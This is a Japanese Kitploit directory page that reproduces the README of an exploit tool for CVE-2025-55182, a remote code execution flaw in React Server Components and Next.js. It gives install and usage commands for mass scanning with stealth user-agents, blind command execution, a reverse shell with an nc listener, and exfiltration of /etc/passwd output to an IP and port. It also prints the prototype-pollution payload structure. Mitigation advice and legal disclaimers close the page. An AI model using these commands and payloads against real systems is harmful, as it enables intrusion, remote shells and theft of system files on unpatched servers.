Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 React Server Components リモートコード実行エクスプロイトツール | Kitploit
ツール/GitHubGitHub/spritualkb/cve-2025-55182-exp
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育レッドチーミングリモートアクセスツールペイロード開発
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 React Server Components リモートコード実行エクスプロイトツール

461239ヶ月前Kitploit レビュー済み
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182-exp

CVE Type Python License

🔥 概要

CVE-2025-55182 は、Server Actions を使用する App Router を採用した Next.js アプリケーションに影響を及ぼす、React Server Components(RSC)における重大なリモートコード実行(RCE)脆弱性です。

この脆弱性は Flight プロトコルの逆シリアル化プロセスに存在し、攻撃者がプロトタイプ汚染(prototype pollution)を通じて任意のコード実行を達成することを可能にします。

⚠️ 免責事項 / 免責声明

認可されたセキュリティテスト専用

このツールは、教育および認可されたペネトレーションテストの目的のみのために提供されます。コンピュータシステムへの不正アクセスは違法です。本ツールの違法または不正な使用についての責任は、すべて使用者にあります。著者は一切の責任を負いません。

本ツールは、認可されたセキュリティテストおよび教育目的にのみ使用できます。違反または不正な操作があった場合、その結果はすべて使用者が負うものとし、著者とは無関係です。

このツールを使用する前に、完全な DISCLAIMER.md をお読みください。

このツールを使用することにより、以下に同意したものとみなされます:

  • あらゆるテストについて適切な許可を取得していること
  • 適用されるすべての法律および規制を遵守すること
  • 自身の行動に対する全責任を受け入れること
  • 著者は誤用に対していかなる責任も負わないこと

📋 影響を受けるバージョン

コンポーネント影響を受けるバージョン
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 使用方法

単一ターゲットのチェック

root@kitploit:~
python3 exploit.py http://target:3000 --check

ファイルからのバッチスキャン

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

コマンドの実行(ブラインド RCE)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

リバースシェル

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

コマンド出力の外部送信

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

プロキシの使用

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 ステルスモード

モード説明
browser実際のブラウザリクエストを模倣します(デフォルト)
crawler検索エンジンのクローラーを模倣します(Googlebot、Baiduspider など)
securityセキュリティスキャナーの User-Agent を使用します

🔧 オプション

オプション説明
targetターゲット URL(例:http://localhost:3000)
-f, --fileターゲット URL を含むファイル(1行に1つ)
-o, --output脆弱なターゲットを保存する出力ファイル
-c, --command実行するコマンド(ブラインド)
--check脆弱性をチェックします
--proxySOCKS5 プロキシ(例:socks5://127.0.0.1:1080)
--stealthステルスモード:browser、crawler、security
--delayリクエスト間の遅延(秒単位)
--variants徹底的なチェックのために複数のペイロードバリアントを使用します
--revshell IP PORTIP:PORT へのリバースシェル
--exfil CMD IP PORTCMD を実行し、出力を IP:PORT に POST します
-t, --timeoutリクエストのタイムアウト(秒単位、デフォルト:15)

🔬 技術的詳細

脆弱性のメカニズム

このエクスプロイトは、Flight プロトコルの逆シリアル化におけるプロトタイプ汚染を利用します:

  1. プロトタイプ汚染: "$1:__proto__:then" を介して Object.prototype.then を汚染します
  2. Function コンストラクタへのアクセス: "$1:constructor:constructor" を介して _formData.get を Function コンストラクタに設定します
  3. コードインジェクション: Function() に渡される _prefix を介して悪意のあるコードを注入します

ペイロード構造

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 ファイル構成

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 targets.txt の形式

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ 対策

  1. 更新: react-server-dom-webpack と Next.js を最新のパッチ適用済みバージョンに更新します
  2. 実装: Server Actions に入力検証を実装します
  3. 使用: 悪意のある Flight プロトコルのペイロードを検出するために Web Application Firewall(WAF)ルールを使用します
  4. 監視: プロトタイプ関連のメッセージを伴う異常なサーバー側エラー(HTTP 500)を監視します

📜 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細については LICENSE ファイルを参照してください。


⚠️ 法的免責事項 / 法的免責声明

英語

使用条件

本ソフトウェアをダウンロード、コピー、インストール、または使用することにより、本免責事項の条件に拘束されることに同意したものとみなされます。

意図された目的

本ツールは専ら以下の目的のために設計されています:

  • 認可されたペネトレーションテスト
  • セキュリティ研究および教育
  • 適切な許可を得た脆弱性評価
  • CTF(キャプチャ・ザ・フラッグ)大会
  • 個人のラボ環境

禁止される使用

本ツールを以下の目的に使用してはなりません:

  • コンピュータシステムへの不正アクセス
  • いかなる違法行為
  • 明示的な書面による許可を得ずにシステムを攻撃すること
  • いかなるシステムまたはデータへの損害の発生
  • 地域、州、国、または国際法に違反するいかなる活動

無保証

本ソフトウェアは、明示的または黙示的な種類の保証なしに「現状有姿(AS IS)」で提供されます。著者は、以下を含むがこれらに限定されないすべての保証を否認します:

  • 商品性
  • 特定の目的への適合性
  • 非侵害

責任の制限

著者は、いかなる場合においても以下について責任を負いません:

  • 直接的、間接的、付随的、特別、懲戒的、または結果的な損害
  • データ、利益、またはビジネスチャンスの喪失
  • 本ツールの誤用から生じる法的結果

ユーザーの責任

ユーザーは以下について全責任を負います:

  • システムをテストする前に適切な許可を取得すること
  • 適用されるすべての法律および規制の遵守
  • 本ツールの使用から生じるいかなる結果
  • 自身の管轄区域における行為の合法性を確保すること

確認事項

本ツールを使用することにより、以下を確認したものとみなされます:

  1. 本免責事項を読み、理解したこと
  2. 本ツールを合法的かつ認可された目的にのみ使用すること
  3. 本ツールの使用に伴うすべてのリスクを受け入れること
  4. 著者は誤用に対していかなる責任も負わないこと

中国語

使用条件

本ソフトウェアをダウンロード、コピー、インストール、または使用する場合、本免責事項の条件に拘束されることに同意したものとみなされます。

意図された目的

本ツールは専ら以下の目的に使用されます:

  • 認可されたペネトレーションテスト
  • セキュリティ研究および教育
  • 適切な許可を得た脆弱性評価
  • CTF(キャプチャ・ザ・フラッグ)大会
  • 個人のラボ環境

禁止される用途

本ツールを以下の目的に使用してはなりません:

  • 許可なくコンピュータシステムにアクセスすること
  • いかなる違法行為
  • 明確な書面による許可なしにシステムを攻撃すること
  • いかなるシステムまたはデータに損害を与えること
  • 地域、州、国、または国際法に違反するいかなる活動

無保証声明

本ソフトウェアは「現状有姿」で提供され、明示的または黙示的な保証は一切提供されません。著者は、以下を含むがこれらに限定されないすべての保証を否認します:

  • 商品性
  • 特定の目的への適合性
  • 非侵害性

責任の制限

いかなる場合においても、著者は以下について責任を負いません:

  • 直接的、間接的、付随的、特別、懲戒的、または結果的な損害
  • データ、利益、またはビジネスチャンスの喪失
  • 本ツールの誤用によって生じる法的結果

ユーザーの責任

ユーザーは以下の事項について全責任を負います:

  • システムをテストする前に適切な許可を取得すること
  • 適用されるすべての法令および規制を遵守すること
  • 本ツールの使用によって生じるいかなる結果
  • 自身の管轄区域における行為の合法性を確保すること

確認声明

本ツールを使用することにより、以下を確認したものとみなされます:

  1. 本免責事項を読み、理解したこと
  2. 本ツールを合法的かつ認可された目的にのみ使用すること
  3. 本ツールの使用に関連するすべてのリスクを受け入れること
  4. 著者はいかなる濫用行為に対しても責任を負わないこと

法律参考 / 法的参考

関連法律 / 関連法規

  • 中国: 『中華人民共和国サイバーセキュリティ法』、『中華人民共和国刑法』第285条、第286条
  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • EU: Directive 2013/40/EU on attacks against information systems
  • UK: Computer Misuse Act 1990

認可テスト要件 / 認可要件

いかなるセキュリティテストを実施する前にも、以下を行う必要があります:

  1. システム所有者の書面による許可を取得すること
  2. テストの範囲と境界を明確に定義すること
  3. 適用されるすべての法令および規制を遵守すること
  4. すべてのテスト活動を記録すること

いかなるセキュリティテストを実施する前にも、以下を行う必要があります:

  1. システム所有者から書面による許可を取得すること
  2. テストの範囲と境界を明確に定義すること
  3. 適用されるすべての法令および規制を遵守すること
  4. すべてのテスト活動を文書化すること

⚠️ 許可のないコンピュータへのアクセスは違法行為です ⚠️
⚠️ 許可のないコンピュータへのアクセスは犯罪行為です ⚠️

ツールをダウンロード